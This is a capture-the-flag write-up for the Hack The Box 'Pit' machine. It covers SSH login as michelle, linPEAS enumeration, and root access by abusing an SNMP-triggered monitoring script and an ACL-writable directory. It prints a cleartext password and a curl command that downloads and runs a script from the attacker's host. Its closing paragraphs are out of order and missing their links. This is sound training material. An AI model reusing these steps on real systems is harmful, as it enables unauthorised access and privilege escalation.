Once we do, we are able to login. This is the attempt we decided to go for as the credentials cannot be used in SSH as it requires the use of SSH keys. While digging through Cockpit, each user can add their own SSH key, so we must do that unless we decide to rely on the web-based terminal Cockpit provides.
┌─[htb 👿 back0ff]─[~/…/Pit]
└─[$]─> ssh michelle@pit.htb -i ~/.ssh/id_rsa
Web console: https://pit.htb:9090/
Last login: Mon Sep 20 00:56:13 2021
[michelle@pit ~]$ id
uid=1000(michelle) gid=1000(michelle) groups=1000(michelle) context=user_u:user_r:user_t:s0Finally we are in and we got user!
[michelle@pit ~]$ cat user.txt
937041********************db1de1At the moment, let's remember we have the following credentials: michelle:ied^ieY6xoquu
Let's try to check the system and use linPEAS:
[michelle@pit ~]$ cd /tmp
[michelle@pit tmp]$ which curl
/usr/bin/curl
[michelle@pit tmp]$ curl -sL http://10.10.14.203:8000/linpeas.sh --output linpeas.sh
[michelle@pit tmp]$ ls
linpeas.sh
systemd-private-3902301ae9d84207995016ea767cc5e9-php-fpm.service-lCUtOS[michelle@pit tmp]$ ./linpeas.sh
▄▄▄▄▄▄▄▄▄▄▄▄▄▄
▄▄▄▄▄▄▄ ▄▄▄▄▄▄▄▄
▄▄▄▄▄▄▄ ▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄ ▄▄▄▄
▄▄▄▄ ▄ ▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄ ▄▄▄▄▄▄
▄ ▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄
▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄ ▄▄▄▄▄ ▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄
▄▄▄▄▄▄▄▄▄▄▄ ▄▄▄▄▄▄ ▄▄▄▄▄▄ ▄
▄▄▄▄▄▄ ▄▄▄▄▄▄▄▄ ▄▄▄▄
▄▄ ▄▄▄ ▄▄▄▄▄ ▄▄▄
▄▄ ▄▄▄▄▄▄▄▄▄▄▄▄ ▄▄
▄ ▄▄ ▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄ ▄▄
▄ ▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄
▄▄▄▄▄▄▄▄▄▄▄▄▄▄ ▄▄▄▄
▄▄▄▄▄ ▄▄▄▄▄ ▄▄▄▄▄▄ ▄▄▄▄
▄▄▄▄ ▄▄▄▄▄ ▄▄▄▄▄ ▄ ▄▄
▄▄▄▄▄ ▄▄▄▄▄ ▄▄▄▄▄▄▄ ▄▄▄▄▄ ▄▄▄▄▄
▄▄▄▄▄▄ ▄▄▄▄▄▄▄ ▄▄▄▄▄▄▄ ▄▄▄▄▄▄▄ ▄▄▄▄▄
▄▄▄▄▄▄▄▄▄▄▄▄▄▄ ▄ ▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄
▄▄▄▄▄▄▄▄▄▄▄▄▄ ▄▄▄▄▄▄▄▄▄▄▄▄▄▄
▄▄▄▄▄▄▄▄▄▄▄ ▄▄▄▄▄▄▄▄▄▄▄▄▄▄
▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄ ▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄
▀▀▄▄▄ ▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄ ▄▄▄▄▄▄▄▀▀▀▀▀▀
▀▀▀▄▄▄▄▄ ▄▄▄▄▄▄▄▄▄▄ ▄▄▄▄▄▄▀▀
▀▀▀▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▀▀▀
/---------------------------------------------------------------------------\
| Do you like PEASS? |
|---------------------------------------------------------------------------|
| Become a Patreon : https://www.patreon.com/peass |
| Follow on Twitter : @carlospolopm |
| Respect on HTB : SirBroccoli & makikvues |
|---------------------------------------------------------------------------|
| Thank you! |
\---------------------------------------------------------------------------/
linpeas-ng by carlospolop
ADVISORY: This script should be used for authorized penetration testing and/or educational purposes only. Any misuse of this software will not be the responsibility of the author or of any other collaborator. Use it at your own networks and/or with the network owner's permission.
Linux Privesc Checklist: https://book.hacktricks.xyz/linux-unix/linux-privilege-escalation-checklist
LEGEND:
RED/YELLOW: 95% a PE vector
RED: You should take a look to it
LightCyan: Users with console
Blue: Users without console & mounted devs
Green: Common things (users, groups, SUID/SGID, mounts, .sh scripts, cronjobs)
LightMagenta: Your username
Starting linpeas. Caching Writable Folders...
...
╔══════════╣ Files with ACLs (limited to 50)
╚ https://book.hacktricks.xyz/linux-unix/privilege-escalation#acls
# file: /usr/local/monitoring
USER root rwx
user michelle -wx
GROUP root rwx
mask rwx
other ---
...After inspecting what linPEAS found, we notice /usr/local/monitoring has an ACL set where michelle only has write and execute rights.
If we recall when we inspected the SNMP dump it gives us something that might be related: .1.3.6.1.4.1.8072.1.3.2.2.1.2.10.109.111.110.105.116.111.114.105.110.103 = STRING: "/usr/bin/monitor"
Let's see what both the monitoring directory and monitor are about:
[michelle@pit tmp]$ ls -ltr /usr/local/monitoring/
ls: cannot open directory '/usr/local/monitoring/': Permission denied
[michelle@pit tmp]$ ls -ltr /usr/bin/monitor
-rwxr--r--. 1 root root 88 Apr 18 2020 /usr/bin/monitor
[michelle@pit tmp]$ file /usr/bin/monitor
/usr/bin/monitor: Bourne-Again shell script, ASCII text executable
[michelle@pit etc]$ cat /usr/bin/monitor
#!/bin/bash
for script in /usr/local/monitoring/check*sh
do
/bin/bash $script
done
Looks like /usr/bin/monitor checks for scripts in the monitoring directory and runs each one. This means we can create a script in this directory and try to run it, but the problem is we cannot as monitor can be execute by root. If we create a script, how can we get it to run if we cannot use /usr/bin/monitor?
Let's insert our private key into a check*.sh script for monitor to run and trigger the script using snmpwalk. First, we must install snmp-mibs-downloader so it looks at all the local mibs and uses them.
┌─[htb 👿 back0ff]─[~/…/Pit]
└─[$]─> snmpwalk -m +MY-MIB -v2c -c public pit.htb nsExtendObjects
MIB search path: /home/jxberrios/.snmp/mibs:/usr/share/snmp/mibs:/usr/share/snmp/mibs/iana:/usr/share/snmp/mibs/ietf
Cannot find module (MY-MIB): At line 1 in (none)
NET-SNMP-EXTEND-MIB::nsExtendNumEntries.0 = INTEGER: 1
NET-SNMP-EXTEND-MIB::nsExtendCommand."monitoring" = STRING: /usr/bin/monitor
NET-SNMP-EXTEND-MIB::nsExtendArgs."monitoring" = STRING:
NET-SNMP-EXTEND-MIB::nsExtendInput."monitoring" = STRING:
NET-SNMP-EXTEND-MIB::nsExtendCacheTime."monitoring" = INTEGER: 5
NET-SNMP-EXTEND-MIB::nsExtendExecType."monitoring" = INTEGER: exec(1)
NET-SNMP-EXTEND-MIB::nsExtendRunType."monitoring" = INTEGER: run-on-read(1)
NET-SNMP-EXTEND-MIB::nsExtendStorage."monitoring" = INTEGER: permanent(4)
NET-SNMP-EXTEND-MIB::nsExtendStatus."monitoring" = INTEGER: active(1)
NET-SNMP-EXTEND-MIB::nsExtendOutput1Line."monitoring" = STRING: Memory usage
NET-SNMP-EXTEND-MIB::nsExtendOutputFull."monitoring" = STRING: Memory usage
total used free shared buff/cache available
Mem: 3.8Gi 474Mi 3.1Gi 8.0Mi 298Mi 3.2Gi
Swap: 1.9Gi 0B 1.9Gi
Database status
OK - Connection to database successful.
System release info
CentOS Linux release 8.3.2011
SELinux Settings
user
Labeling MLS/ MLS/
SELinux User Prefix MCS Level MCS Range SELinux Roles
guest_u user s0 s0 guest_r
root user s0 s0-s0:c0.c1023 staff_r sysadm_r system_r unconfined_r
staff_u user s0 s0-s0:c0.c1023 staff_r sysadm_r unconfined_r
sysadm_u user s0 s0-s0:c0.c1023 sysadm_r
system_u user s0 s0-s0:c0.c1023 system_r unconfined_r
unconfined_u user s0 s0-s0:c0.c1023 system_r unconfined_r
user_u user s0 s0 user_r
xguest_u user s0 s0 xguest_r
login
Login Name SELinux User MLS/MCS Range Service
__default__ unconfined_u s0-s0:c0.c1023 *
michelle user_u s0 *
root unconfined_u s0-s0:c0.c1023 *
System uptime
22:23:42 up 13 min, 2 users, load average: 1.18, 0.59, 0.33
NET-SNMP-EXTEND-MIB::nsExtendOutNumLines."monitoring" = INTEGER: 31
NET-SNMP-EXTEND-MIB::nsExtendResult."monitoring" = INTEGER: 0
NET-SNMP-EXTEND-MIB::nsExtendOutLine."monitoring".1 = STRING: Memory usage
NET-SNMP-EXTEND-MIB::nsExtendOutLine."monitoring".2 = STRING: total used free shared buff/cache available
NET-SNMP-EXTEND-MIB::nsExtendOutLine."monitoring".3 = STRING: Mem: 3.8Gi 474Mi 3.1Gi 8.0Mi 298Mi 3.2Gi
NET-SNMP-EXTEND-MIB::nsExtendOutLine."monitoring".4 = STRING: Swap: 1.9Gi 0B 1.9Gi
NET-SNMP-EXTEND-MIB::nsExtendOutLine."monitoring".5 = STRING: Database status
NET-SNMP-EXTEND-MIB::nsExtendOutLine."monitoring".6 = STRING: OK - Connection to database successful.
NET-SNMP-EXTEND-MIB::nsExtendOutLine."monitoring".7 = STRING: System release info
NET-SNMP-EXTEND-MIB::nsExtendOutLine."monitoring".8 = STRING: CentOS Linux release 8.3.2011
NET-SNMP-EXTEND-MIB::nsExtendOutLine."monitoring".9 = STRING: SELinux Settings
NET-SNMP-EXTEND-MIB::nsExtendOutLine."monitoring".10 = STRING: user
NET-SNMP-EXTEND-MIB::nsExtendOutLine."monitoring".11 = STRING:
NET-SNMP-EXTEND-MIB::nsExtendOutLine."monitoring".12 = STRING: Labeling MLS/ MLS/
NET-SNMP-EXTEND-MIB::nsExtendOutLine."monitoring".13 = STRING: SELinux User Prefix MCS Level MCS Range SELinux Roles
NET-SNMP-EXTEND-MIB::nsExtendOutLine."monitoring".14 = STRING:
NET-SNMP-EXTEND-MIB::nsExtendOutLine."monitoring".15 = STRING: guest_u user s0 s0 guest_r
NET-SNMP-EXTEND-MIB::nsExtendOutLine."monitoring".16 = STRING: root user s0 s0-s0:c0.c1023 staff_r sysadm_r system_r unconfined_r
NET-SNMP-EXTEND-MIB::nsExtendOutLine."monitoring".17 = STRING: staff_u user s0 s0-s0:c0.c1023 staff_r sysadm_r unconfined_r
NET-SNMP-EXTEND-MIB::nsExtendOutLine."monitoring".18 = STRING: sysadm_u user s0 s0-s0:c0.c1023 sysadm_r
NET-SNMP-EXTEND-MIB::nsExtendOutLine."monitoring".19 = STRING: system_u user s0 s0-s0:c0.c1023 system_r unconfined_r
NET-SNMP-EXTEND-MIB::nsExtendOutLine."monitoring".20 = STRING: unconfined_u user s0 s0-s0:c0.c1023 system_r unconfined_r
NET-SNMP-EXTEND-MIB::nsExtendOutLine."monitoring".21 = STRING: user_u user s0 s0 user_r
NET-SNMP-EXTEND-MIB::nsExtendOutLine."monitoring".22 = STRING: xguest_u user s0 s0 xguest_r
NET-SNMP-EXTEND-MIB::nsExtendOutLine."monitoring".23 = STRING: login
NET-SNMP-EXTEND-MIB::nsExtendOutLine."monitoring".24 = STRING:
NET-SNMP-EXTEND-MIB::nsExtendOutLine."monitoring".25 = STRING: Login Name SELinux User MLS/MCS Range Service
NET-SNMP-EXTEND-MIB::nsExtendOutLine."monitoring".26 = STRING:
NET-SNMP-EXTEND-MIB::nsExtendOutLine."monitoring".27 = STRING: __default__ unconfined_u s0-s0:c0.c1023 *
NET-SNMP-EXTEND-MIB::nsExtendOutLine."monitoring".28 = STRING: michelle user_u s0 *
NET-SNMP-EXTEND-MIB::nsExtendOutLine."monitoring".29 = STRING: root unconfined_u s0-s0:c0.c1023 *
NET-SNMP-EXTEND-MIB::nsExtendOutLine."monitoring".30 = STRING: System uptime
NET-SNMP-EXTEND-MIB::nsExtendOutLine."monitoring".31 = STRING: 22:23:42 up 13 min, 2 users, load average: 1.18, 0.59, 0.33
NET-SNMP-EXTEND-MIB::nsExtendOutLine."monitoring".31 = No more variables left in this MIB View (It is past the end of the MIB tree)Now let's try to SSH as root.
┌─[htb 👿 back0ff]─[~/…/Pit]
└─[$]─> ssh root@pit.htb -i ~/.ssh/id_rsa
Web console: https://pit.htb:9090/
Last login: Mon Jul 26 09:15:10 2021
[root@pit ~]# id; whoami
uid=0(root) gid=0(root) groups=0(root) context=unconfined_u:unconfined_r:unconfined_t:s0-s0:c0.c1023
rootAND we are in!! Let's get the flag!
[root@pit ~]# cat root.txt
fb7aeb********************7b53f4When we browse to we get what looks to be a default nginx page running on version 1.14.1 and running on Redhat! The NGinx information was first provided by nmap.
When we go to , not only we get redirected to an https site, but we also find a CentOS related login page. From what nmap gave us, you can see the service is http-related but also shows a bad request followed by the use of SSL. If we want to confirm the redirection to https:
While doing some searches on how to pull more data from snmp, we come up with these perl scripts which gave us more information (). The following allow us to do a bulk walk on snmp.
This gives a lead. If we test this against the domains we know, only responds and redirect us to a login page.
With valid credentials, we can now attempt to to use the authenticated RCE exploit available ().
At the moment, we have a confirmed user in the host, 'michelle', and a password in cleartext. We can test and see if the password was used on the database following the lazy admin approach against as it has a login page found earlier. Since this application is Cockpit, a server administration tool sponsored by Red Hat, we can try these credentials there.
According to , there are ways to abuse snmp. After looking at the system and what we can do with the user, we can only think of going back at snmp since it showed us /usr/bin/monitor.
